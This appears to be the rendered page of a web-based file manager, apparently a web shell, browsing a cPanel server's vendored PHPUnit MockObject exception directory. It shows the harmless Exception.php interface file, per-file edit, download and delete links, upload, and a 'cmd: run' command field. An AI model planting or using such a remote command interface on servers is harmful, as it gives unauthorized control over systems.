/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
phpunit
/
phpunit
/
src
/
Framework
/
MockObject
/
Exception
/
/opt/cpanel/ea-wappspector/vendor/phpunit/phpunit/src/Framework/MockObject/Exception
mkdir
upload
Name
Size
Mode
Actions
BadMethodCallException.php
591
0644
edit
dl
rm
CannotUseOnlyMethodsException.php
939
0644
edit
dl
rm
Exception.php
554
0644
edit
dl
rm
IncompatibleReturnValueException.php
1038
0644
edit
dl
rm
MatchBuilderNotFoundException.php
853
0644
edit
dl
rm
MatcherAlreadyRegisteredException.php
845
0644
edit
dl
rm
MethodCannotBeConfiguredException.php
943
0644
edit
dl
rm
MethodNameAlreadyConfiguredException.php
722
0644
edit
dl
rm
MethodNameNotConfiguredException.php
714
0644
edit
dl
rm
MethodParametersAlreadyConfiguredException.php
731
0644
edit
dl
rm
NeverReturningMethodException.php
932
0644
edit
dl
rm
NoMoreReturnValuesConfiguredException.php
1024
0644
edit
dl
rm
ReturnValueNotConfiguredException.php
961
0644
edit
dl
rm
RuntimeException.php
579
0644
edit
dl
rm
Edit:
/opt/cpanel/ea-wappspector/vendor/phpunit/phpunit/src/Framework/MockObject/Exception/Exception.php
(554B)
<?php declare(strict_types=1); /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PHPUnit\Framework\MockObject; /** * @no-named-arguments Parameter names are not covered by the backward compatibility promise for PHPUnit * * @internal This interface is not covered by the backward compatibility promise for PHPUnit */ interface Exception extends \PHPUnit\Exception { }
Save
cmd:
run